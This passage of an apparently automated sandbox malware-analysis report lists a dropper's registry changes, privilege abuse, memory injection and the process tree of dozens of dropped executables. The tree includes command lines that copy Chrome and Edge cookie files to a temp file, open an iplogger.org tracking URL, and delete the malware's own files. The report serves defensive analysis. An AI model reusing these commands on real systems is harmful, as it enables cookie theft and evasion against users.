Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1e5ca87b2c7dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" MicrosoftEdge.exe -
Runs .reg file with regedit 2 IoCs
pid Process 4800 regedit.exe 6156 regedit.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5964 PING.EXE 6408 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4532 rundll32.exe 4532 rundll32.exe 1104 svchost.exe 1104 svchost.exe 4304 pub2.exe 4304 pub2.exe 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found 3060 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4456 MicrosoftEdgeCP.exe 4456 MicrosoftEdgeCP.exe 4304 pub2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3112 MicrosoftEdge.exe Token: SeDebugPrivilege 3112 MicrosoftEdge.exe Token: SeDebugPrivilege 3112 MicrosoftEdge.exe Token: SeDebugPrivilege 3112 MicrosoftEdge.exe Token: SeCreateTokenPrivilege 4200 Install.exe Token: SeAssignPrimaryTokenPrivilege 4200 Install.exe Token: SeLockMemoryPrivilege 4200 Install.exe Token: SeIncreaseQuotaPrivilege 4200 Install.exe Token: SeMachineAccountPrivilege 4200 Install.exe Token: SeTcbPrivilege 4200 Install.exe Token: SeSecurityPrivilege 4200 Install.exe Token: SeTakeOwnershipPrivilege 4200 Install.exe Token: SeLoadDriverPrivilege 4200 Install.exe Token: SeSystemProfilePrivilege 4200 Install.exe Token: SeSystemtimePrivilege 4200 Install.exe Token: SeProfSingleProcessPrivilege 4200 Install.exe Token: SeIncBasePriorityPrivilege 4200 Install.exe Token: SeCreatePagefilePrivilege 4200 Install.exe Token: SeCreatePermanentPrivilege 4200 Install.exe Token: SeBackupPrivilege 4200 Install.exe Token: SeRestorePrivilege 4200 Install.exe Token: SeShutdownPrivilege 4200 Install.exe Token: SeDebugPrivilege 4200 Install.exe Token: SeAuditPrivilege 4200 Install.exe Token: SeSystemEnvironmentPrivilege 4200 Install.exe Token: SeChangeNotifyPrivilege 4200 Install.exe Token: SeRemoteShutdownPrivilege 4200 Install.exe Token: SeUndockPrivilege 4200 Install.exe Token: SeSyncAgentPrivilege 4200 Install.exe Token: SeEnableDelegationPrivilege 4200 Install.exe Token: SeManageVolumePrivilege 4200 Install.exe Token: SeImpersonatePrivilege 4200 Install.exe Token: SeCreateGlobalPrivilege 4200 Install.exe Token: 31 4200 Install.exe Token: 32 4200 Install.exe Token: 33 4200 Install.exe Token: 34 4200 Install.exe Token: 35 4200 Install.exe Token: SeDebugPrivilege 3140 KRSetp.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 1104 svchost.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4532 rundll32.exe Token: SeDebugPrivilege 4604 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4604 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4604 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4604 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3060 Process not Found Token: SeCreatePagefilePrivilege 3060 Process not Found Token: SeShutdownPrivilege 3060 Process not Found Token: SeCreatePagefilePrivilege 3060 Process not Found Token: SeShutdownPrivilege 3060 Process not Found Token: SeCreatePagefilePrivilege 3060 Process not Found Token: SeShutdownPrivilege 3060 Process not Found -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1148 File.exe 1148 File.exe 1148 File.exe 1148 File.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1148 File.exe 1148 File.exe 1148 File.exe 1148 File.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 3112 MicrosoftEdge.exe 3920 Info.exe 4456 MicrosoftEdgeCP.exe 4456 MicrosoftEdgeCP.exe 5184 nKfknZKhwp5nxxbZvhxI66_E.exe 5264 cmF0KfcxRZsKpz_jGg9BNZbS.exe 5412 iwxWWGVxR3Uowz3HZszRjroq.exe 5804 UrN6lb3a_OKPUuxjic9qNDU6.exe 5900 vcwFgU6ktFApk5A8Q2tvcvlA.exe 6136 NkQMFCgtR5NPdWS_ZbJfCPpp.exe 6108 wc5C0EUt5fcejaA3jOnxOeYi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 656 wrote to memory of 3200 656 88A990A868EADA802839185B6F05C541.exe 75 PID 656 wrote to memory of 3200 656 88A990A868EADA802839185B6F05C541.exe 75 PID 656 wrote to memory of 3200 656 88A990A868EADA802839185B6F05C541.exe 75 PID 3200 wrote to memory of 1148 3200 Files.exe 77 PID 3200 wrote to memory of 1148 3200 Files.exe 77 PID 3200 wrote to memory of 1148 3200 Files.exe 77 PID 656 wrote to memory of 1908 656 88A990A868EADA802839185B6F05C541.exe 81 PID 656 wrote to memory of 1908 656 88A990A868EADA802839185B6F05C541.exe 81 PID 656 wrote to memory of 1908 656 88A990A868EADA802839185B6F05C541.exe 81 PID 656 wrote to memory of 3140 656 88A990A868EADA802839185B6F05C541.exe 83 PID 656 wrote to memory of 3140 656 88A990A868EADA802839185B6F05C541.exe 83 PID 656 wrote to memory of 3920 656 88A990A868EADA802839185B6F05C541.exe 84 PID 656 wrote to memory of 3920 656 88A990A868EADA802839185B6F05C541.exe 84 PID 656 wrote to memory of 3920 656 88A990A868EADA802839185B6F05C541.exe 84 PID 656 wrote to memory of 4152 656 88A990A868EADA802839185B6F05C541.exe 85 PID 656 wrote to memory of 4152 656 88A990A868EADA802839185B6F05C541.exe 85 PID 656 wrote to memory of 4152 656 88A990A868EADA802839185B6F05C541.exe 85 PID 1908 wrote to memory of 4240 1908 Folder.exe 87 PID 1908 wrote to memory of 4240 1908 Folder.exe 87 PID 1908 wrote to memory of 4240 1908 Folder.exe 87 PID 656 wrote to memory of 4200 656 88A990A868EADA802839185B6F05C541.exe 86 PID 656 wrote to memory of 4200 656 88A990A868EADA802839185B6F05C541.exe 86 PID 656 wrote to memory of 4200 656 88A990A868EADA802839185B6F05C541.exe 86 PID 656 wrote to memory of 4304 656 88A990A868EADA802839185B6F05C541.exe 89 PID 656 wrote to memory of 4304 656 88A990A868EADA802839185B6F05C541.exe 89 PID 656 wrote to memory of 4304 656 88A990A868EADA802839185B6F05C541.exe 89 PID 4496 wrote to memory of 4532 4496 rUNdlL32.eXe 92 PID 4496 wrote to memory of 4532 4496 rUNdlL32.eXe 92 PID 4496 wrote to memory of 4532 4496 rUNdlL32.eXe 92 PID 4532 wrote to memory of 1104 4532 rundll32.exe 69 PID 1104 wrote to memory of 4668 1104 svchost.exe 94 PID 1104 wrote to memory of 4668 1104 svchost.exe 94 PID 4532 wrote to memory of 2788 4532 rundll32.exe 53 PID 1104 wrote to memory of 4668 1104 svchost.exe 94 PID 4532 wrote to memory of 340 4532 rundll32.exe 36 PID 4532 wrote to memory of 2396 4532 rundll32.exe 60 PID 4532 wrote to memory of 2412 4532 rundll32.exe 59 PID 4532 wrote to memory of 1092 4532 rundll32.exe 14 PID 4532 wrote to memory of 1040 4532 rundll32.exe 13 PID 4532 wrote to memory of 1424 4532 rundll32.exe 21 PID 4532 wrote to memory of 1960 4532 rundll32.exe 31 PID 4532 wrote to memory of 1248 4532 rundll32.exe 17 PID 4532 wrote to memory of 1240 4532 rundll32.exe 18 PID 4532 wrote to memory of 2636 4532 rundll32.exe 56 PID 4532 wrote to memory of 2692 4532 rundll32.exe 55 PID 4456 wrote to memory of 4604 4456 MicrosoftEdgeCP.exe 93 PID 4456 wrote to memory of 4604 4456 MicrosoftEdgeCP.exe 93 PID 4456 wrote to memory of 4604 4456 MicrosoftEdgeCP.exe 93 PID 4456 wrote to memory of 4604 4456 MicrosoftEdgeCP.exe 93 PID 4456 wrote to memory of 2816 4456 MicrosoftEdgeCP.exe 96 PID 4456 wrote to memory of 2816 4456 MicrosoftEdgeCP.exe 96 PID 4456 wrote to memory of 2816 4456 MicrosoftEdgeCP.exe 96 PID 4456 wrote to memory of 2816 4456 MicrosoftEdgeCP.exe 96 PID 4200 wrote to memory of 4336 4200 Install.exe 101 PID 4200 wrote to memory of 4336 4200 Install.exe 101 PID 4200 wrote to memory of 4336 4200 Install.exe 101 PID 4336 wrote to memory of 4240 4336 cmd.exe 103 PID 4336 wrote to memory of 4240 4336 cmd.exe 103 PID 4336 wrote to memory of 4240 4336 cmd.exe 103 PID 1040 wrote to memory of 5056 1040 svchost.exe 106 PID 1040 wrote to memory of 5056 1040 svchost.exe 106 PID 1040 wrote to memory of 5056 1040 svchost.exe 106 PID 3920 wrote to memory of 5204 3920 Info.exe 112 PID 3920 wrote to memory of 5204 3920 Info.exe 112
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Users\Admin\AppData\Roaming\biaefvjC:\Users\Admin\AppData\Roaming\biaefvj2⤵
- Executes dropped EXE
PID:5056 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 4843⤵
- Program crash
PID:5976
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1092
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1248
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1240
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1424
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1960
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:340
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2788
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2692
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2636
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2412
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2396
-
C:\Users\Admin\AppData\Local\Temp\88A990A868EADA802839185B6F05C541.exe"C:\Users\Admin\AppData\Local\Temp\88A990A868EADA802839185B6F05C541.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1148
-
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
PID:4240
-
-
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Users\Admin\Documents\vfO6gwyWSeGrYGgCMvVCzYNj.exe"C:\Users\Admin\Documents\vfO6gwyWSeGrYGgCMvVCzYNj.exe"3⤵
- Executes dropped EXE
PID:5168 -
C:\Users\Admin\Documents\vfO6gwyWSeGrYGgCMvVCzYNj.exeC:\Users\Admin\Documents\vfO6gwyWSeGrYGgCMvVCzYNj.exe4⤵PID:4296
-
-
-
C:\Users\Admin\Documents\nKfknZKhwp5nxxbZvhxI66_E.exe"C:\Users\Admin\Documents\nKfknZKhwp5nxxbZvhxI66_E.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5184 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "4⤵PID:5716
-
C:\Windows\SysWOW64\explorer.exeexplorer https://iplogger.org/2LBCU65⤵PID:1508
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s adj.reg5⤵
- Runs .reg file with regedit
PID:4800
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s adj2.reg5⤵
- Runs .reg file with regedit
PID:6156
-
-
-
C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"4⤵PID:3500
-
C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"5⤵PID:6328
-
-
-
-
C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe"C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe"3⤵
- Executes dropped EXE
PID:5176 -
C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exeC:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe4⤵
- Executes dropped EXE
PID:6072
-
-
C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exeC:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe4⤵
- Executes dropped EXE
PID:4016
-
-
C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exeC:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe4⤵PID:5280
-
-
C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exeC:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe4⤵PID:5920
-
-
-
C:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exe"C:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5204 -
C:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exeC:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exe4⤵PID:5488
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Mnr__Rr2OKzsxfOBINPifWt4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exe" & del C:\ProgramData\*.dll & exit5⤵PID:6644
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Mnr__Rr2OKzsxfOBINPifWt4.exe /f6⤵
- Kills process with taskkill
PID:7280
-
-
-
-
-
C:\Users\Admin\Documents\LNXz4peJ_8ZzfRBexFSZCeeA.exe"C:\Users\Admin\Documents\LNXz4peJ_8ZzfRBexFSZCeeA.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5196 -
C:\Users\Admin\Documents\LNXz4peJ_8ZzfRBexFSZCeeA.exeC:\Users\Admin\Documents\LNXz4peJ_8ZzfRBexFSZCeeA.exe4⤵
- Executes dropped EXE
PID:6044
-
-
-
C:\Users\Admin\Documents\4gVRAMZibFMa2cjSSUDELd7Q.exe"C:\Users\Admin\Documents\4gVRAMZibFMa2cjSSUDELd7Q.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5236 -
C:\Users\Admin\Documents\4gVRAMZibFMa2cjSSUDELd7Q.exeC:\Users\Admin\Documents\4gVRAMZibFMa2cjSSUDELd7Q.exe4⤵
- Executes dropped EXE
PID:6064
-
-
-
C:\Users\Admin\Documents\iwxWWGVxR3Uowz3HZszRjroq.exe"C:\Users\Admin\Documents\iwxWWGVxR3Uowz3HZszRjroq.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5412 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4300
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5724
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7060
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6724
-
-
-
C:\Users\Admin\Documents\txwju7KqHciQvUjVbPKUeEkl.exe"C:\Users\Admin\Documents\txwju7KqHciQvUjVbPKUeEkl.exe"3⤵
- Executes dropped EXE
PID:5340
-
-
C:\Users\Admin\Documents\cmF0KfcxRZsKpz_jGg9BNZbS.exe"C:\Users\Admin\Documents\cmF0KfcxRZsKpz_jGg9BNZbS.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5264 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp4⤵PID:4340
-
C:\Windows\SysWOW64\cmd.execmd5⤵PID:6088
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp6⤵PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comAcre.exe.com k6⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k7⤵PID:492
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 306⤵
- Executes dropped EXE
- Runs ping.exe
PID:5964
-
-
-
-
-
C:\Users\Admin\Documents\6mq72uEDlO8PvAyx8SsxRD7D.exe"C:\Users\Admin\Documents\6mq72uEDlO8PvAyx8SsxRD7D.exe"3⤵
- Executes dropped EXE
PID:5700 -
C:\Users\Admin\AppData\Roaming\6591511.exe"C:\Users\Admin\AppData\Roaming\6591511.exe"4⤵PID:1780
-
-
C:\Users\Admin\AppData\Roaming\3163208.exe"C:\Users\Admin\AppData\Roaming\3163208.exe"4⤵PID:5652
-
-
-
C:\Users\Admin\Documents\TZWAYtMVnr7WtnJ3GhcUDLxp.exe"C:\Users\Admin\Documents\TZWAYtMVnr7WtnJ3GhcUDLxp.exe"3⤵
- Executes dropped EXE
PID:5784 -
C:\Users\Admin\Documents\TZWAYtMVnr7WtnJ3GhcUDLxp.exe"C:\Users\Admin\Documents\TZWAYtMVnr7WtnJ3GhcUDLxp.exe"4⤵PID:3180
-
-
-
C:\Users\Admin\Documents\UrN6lb3a_OKPUuxjic9qNDU6.exe"C:\Users\Admin\Documents\UrN6lb3a_OKPUuxjic9qNDU6.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5804 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im UrN6lb3a_OKPUuxjic9qNDU6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\UrN6lb3a_OKPUuxjic9qNDU6.exe" & del C:\ProgramData\*.dll & exit4⤵PID:6476
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im UrN6lb3a_OKPUuxjic9qNDU6.exe /f5⤵
- Kills process with taskkill
PID:7048
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:6468
-
-
-
-
C:\Users\Admin\Documents\XO8LPI42kK5rFGIX30qEmIJm.exe"C:\Users\Admin\Documents\XO8LPI42kK5rFGIX30qEmIJm.exe"3⤵
- Executes dropped EXE
PID:5828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 6604⤵
- Program crash
PID:6004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 6724⤵
- Program crash
PID:5040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 7804⤵
- Program crash
PID:1780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 8164⤵
- Program crash
PID:4492
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 10924⤵
- Program crash
PID:5156
-
-
-
C:\Users\Admin\Documents\rteEoHmAeIECR3WOOBfQi8TF.exe"C:\Users\Admin\Documents\rteEoHmAeIECR3WOOBfQi8TF.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5872
-
-
C:\Users\Admin\Documents\vcwFgU6ktFApk5A8Q2tvcvlA.exe"C:\Users\Admin\Documents\vcwFgU6ktFApk5A8Q2tvcvlA.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5900
-
-
C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe"C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe"3⤵PID:5964
-
C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exeC:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe4⤵PID:972
-
-
C:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exeC:\Users\Admin\Documents\iUB0iMTdmBK7rpqlqFt8J43Z.exe4⤵PID:4904
-
-
-
C:\Users\Admin\Documents\wc5C0EUt5fcejaA3jOnxOeYi.exe"C:\Users\Admin\Documents\wc5C0EUt5fcejaA3jOnxOeYi.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6108 -
C:\Users\Admin\Documents\wc5C0EUt5fcejaA3jOnxOeYi.exe"C:\Users\Admin\Documents\wc5C0EUt5fcejaA3jOnxOeYi.exe" -a4⤵PID:3164
-
-
-
C:\Users\Admin\Documents\NkQMFCgtR5NPdWS_ZbJfCPpp.exe"C:\Users\Admin\Documents\NkQMFCgtR5NPdWS_ZbJfCPpp.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6136 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"4⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\setup_install.exe"5⤵PID:5388
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_1.exe6⤵PID:5524
-
C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\karotima_1.exekarotima_1.exe7⤵PID:4116
-
C:\Users\Admin\Documents\8GKtF0IDCZROmN_81D65Ac3t.exe"C:\Users\Admin\Documents\8GKtF0IDCZROmN_81D65Ac3t.exe"8⤵PID:7084
-
-
C:\Users\Admin\Documents\I92bEWzlEkUL7PR0zwDx3oFn.exe"C:\Users\Admin\Documents\I92bEWzlEkUL7PR0zwDx3oFn.exe"8⤵PID:6284
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵PID:7392
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵PID:7820
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵PID:8100
-
-
-
C:\Users\Admin\Documents\pHYiVdWffBjmvoyLu_hXPQdK.exe"C:\Users\Admin\Documents\pHYiVdWffBjmvoyLu_hXPQdK.exe"8⤵PID:6384
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"9⤵PID:6524
-
C:\Users\Admin\AppData\Local\Temp\7zSC7942356\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC7942356\setup_install.exe"10⤵PID:6708
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_1.exe11⤵PID:6432
-
C:\Users\Admin\AppData\Local\Temp\7zSC7942356\karotima_1.exekarotima_1.exe12⤵PID:7096
-
C:\Users\Admin\Documents\n_D4FR_jvHbfQHpY9gftDqDI.exe"C:\Users\Admin\Documents\n_D4FR_jvHbfQHpY9gftDqDI.exe"13⤵PID:7308
-
C:\Users\Admin\Documents\n_D4FR_jvHbfQHpY9gftDqDI.exeC:\Users\Admin\Documents\n_D4FR_jvHbfQHpY9gftDqDI.exe14⤵PID:7752
-
